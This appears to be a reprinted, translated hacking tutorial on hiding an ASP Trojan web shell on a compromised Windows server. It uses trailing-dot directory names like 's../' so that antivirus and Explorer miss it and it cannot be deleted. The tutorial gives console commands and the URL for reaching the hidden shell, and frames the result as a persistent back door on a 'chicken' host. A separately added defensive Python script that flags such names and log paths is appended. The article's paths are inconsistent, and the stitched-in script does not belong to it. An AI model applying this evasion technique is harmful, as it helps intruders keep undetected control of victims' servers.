How can I keep an ASP Trojan from being killed?

xiaoxiao, 2021-03-06

Reprinted: 〓冰〓

You might say the way to escape anti-virus is to modify or encrypt the ASP Trojan's code. Wrong: this needs no modification at all, and no one can guarantee that the ASP you modified will not be killed by XX anti-virus software. Anyway, I am too lazy for that, heh. We run CMD and change to C:/Winnt/System32/MyHome, that is, the path your virtual directory maps to. First, some background. Everyone knows that the "/" symbol in Windows is the path separator: "c:/windows/" means the Windows folder on the C partition, and "c:/windows/system.exe" means the system.exe file in the Windows folder on the C partition. With that in mind, let us continue:

What if there is a "/" symbol in the file name itself? Suppose "s/" is the name of a folder located in "f:/", so that its path is "f:/s/". When we try to access it, Windows gets it wrong: it thinks the thing we want to open is the s folder on the F partition, so it cannot open it and returns an error, because that path does not exist.

Maybe you are trying to create an "s/" file right now, but Windows will tell you that the "/" symbol cannot be used in the name of a file or folder. It seems Windows has thought of this too. OK, let us continue; do not believe that files containing the "/" symbol cannot be created.

Now turn on your computer; we are going to make some very interesting attempts. After entering Windows, click Start > Run, type "cmd" and press Enter (on Win98, type "command"). You will then see the Windows command console, which we will use to complete the rest of the test. In what follows, the text in {} is my comment:

    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:/WinNT/System32/MyHome> mkdir s/      {Our first attempt: Windows only creates the "s" folder; the "/" is ignored}
    C:/WinNT/System32/MyHome> mkdir s/s1/   {Still failed: Windows first creates the s folder, then creates the s1 folder}
    C:/WinNT/System32/MyHome> mkdir s./     {"s./" is parsed as "s"; the "./" is also ignored}
    A subdirectory or file s./ already exists.
    C:/WinNT/System32/MyHome> mkdir s../    {Finally succeeded: you can now see "s." in Explorer, but you cannot open or delete it}
    C:/WinNT/System32/MyHome> mkdir s.../   {Succeeded: you can see "s.." in Explorer; you can open it but you cannot delete it}

Why is this? Let us start with the "s." folder you see. You cannot open it and you cannot delete it. It cannot be opened because its actual path is "C:/Winnt/System32/MyHome/s../" (we created it ourselves, so we can be sure of its actual path), but the name shown in Windows Explorer becomes "s.". That is to say, when you try to open it, Windows actually tries to open "C:/Winnt/System32/MyHome/s./". Of course that cannot be opened: the file does not exist, so Windows reports an error. It cannot be deleted for the same reason: Windows parses a path that actually exists into one that does not, so the operation cannot be carried out. As for the other folder, we said it can be opened but cannot be deleted. Wait... opened? Do you think Windows really opens the "s.../" folder we created? The following test will make it clear. As before, the text in {} is my annotation, to make things easier to follow:

    ----------------------------------------------
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:/Winnt/System32/MyHome> copy net.asp s../   {Copy your ASP Trojan file to "s../", which the resource manager shows as "s."}
    1 file(s) copied.
    C:/Winnt/System32/MyHome>

Now return to your resource manager and open the "s." folder. What do you see? How did the "net.asp" file get here? Didn't we just copy it to "s."? Could it be that opening the "s." folder actually opens "s"? Yes, that is exactly the case. In fact, if you create an "s" folder, opening "s." actually opens "s".

This is the key point. We use the "s." directory, which does not get killed, to hide our Trojan, whether or not the Trojan itself would be detected. An ordinary exe file cannot run from a directory like "s.", but an ASP Trojan can! Using the CMD commands, copy net.asp into the "s." directory and delete the original net.asp. Then, in the browser, at

http://127.0.0.1/kiss/kiss/s../net.asp

we can see that the ASP Trojan is there. Ordinary users will not find it, and even professional anti-virus software will only scan "s" and skip "s../". Now let us talk about how to delete it.

    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    F:/test> dir
     Volume in drive F is BGTING
     Volume Serial Number is 2C8E-FE1C

     Directory of F:/test

    2003-09-11  17:50    .
    2003-09-11  17:50    ..
    2003-09-11  18:35    s.
    2003-09-11  18:37    s..
                   1 File(s)              9 bytes
                   5 Dir(s)   3,390,029,824 bytes free

    C:/WinNT/System32/MyHome> rmdir s../
    The directory is not empty.
    C:/WinNT/System32/MyHome> rmdir s../ /s
    s../, Are you sure (Y/N)? Y
    C:/WinNT/System32/MyHome> rmdir s.../ /s
    s.../, Are you sure (Y/N)? Y

This way there is no need to worry about losing the "chicken" (the compromised host). It is a very well hidden back door, and it does not get killed. On a compromised host, the above should be tested through 3389.
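From the defender's side, the trick above leaves two artifacts that are easy to check for: directory names that end in a dot or space (which ordinary Win32 path handling strips, so normal tools resolve a different name) and requested URL paths that contain such a segment. The following is an added example, not code from the original article; the sample log lines and directory layout are constructed, and it assumes a local drive path and that the first log field starting with "/" is the URI stem.

```python
import os
import sys
import tempfile

# Constructed sample: W3C-style IIS log lines (not from the original page).
SAMPLE_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status",
    "2003-09-11 18:40:02 127.0.0.1 GET /kiss/kiss/s../net.asp - 80 127.0.0.1 200",
    "2003-09-11 18:41:10 127.0.0.1 GET /kiss/default.asp - 80 127.0.0.1 200",
]

def is_normalized_away(name):
    """True if Win32 path normalization would strip trailing dots/spaces."""
    return name not in (".", "..") and name != name.rstrip(". ")

def scan_tree(root):
    """Return relative paths of entries whose names end in a dot or space."""
    start = os.path.abspath(root)
    if sys.platform == "win32":
        start = "\\\\?\\" + start  # \\?\ prefix: enumerate without normalization
    hits, stack = [], [start]
    while stack:
        current = stack.pop()
        with os.scandir(current) as entries:
            for entry in entries:
                if is_normalized_away(entry.name):
                    hits.append(entry.path[len(start):].lstrip("\\/"))
                if entry.is_dir(follow_symlinks=False):
                    stack.append(entry.path)
    return sorted(hits)

def suspicious_url_paths(log_lines):
    """Return requested paths that contain such a segment.
    Assumption: the first field starting with "/" is cs-uri-stem."""
    hits = []
    for line in log_lines:
        stem = next((f for f in line.split() if f.startswith("/")), None)
        if stem and not line.startswith("#"):
            if any(is_normalized_away(s) for s in stem.split("/") if s):
                hits.append(stem)
    return hits

def demo():
    """Build a constructed web root and run both checks."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "kiss", "s"))
        if sys.platform != "win32":  # plain Win32 paths cannot create "s.."
            os.makedirs(os.path.join(root, "kiss", "s.."))
        return scan_tree(root), suspicious_url_paths(SAMPLE_LOG)

if __name__ == "__main__":
    print(demo())
```

Ordinary "." and ".." segments are deliberately not flagged, so relative-path requests do not produce noise; only names that differ from their normalized form are reported.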

When reprinting, please cite the original address: https://www.9cbs.com/read-87043.html
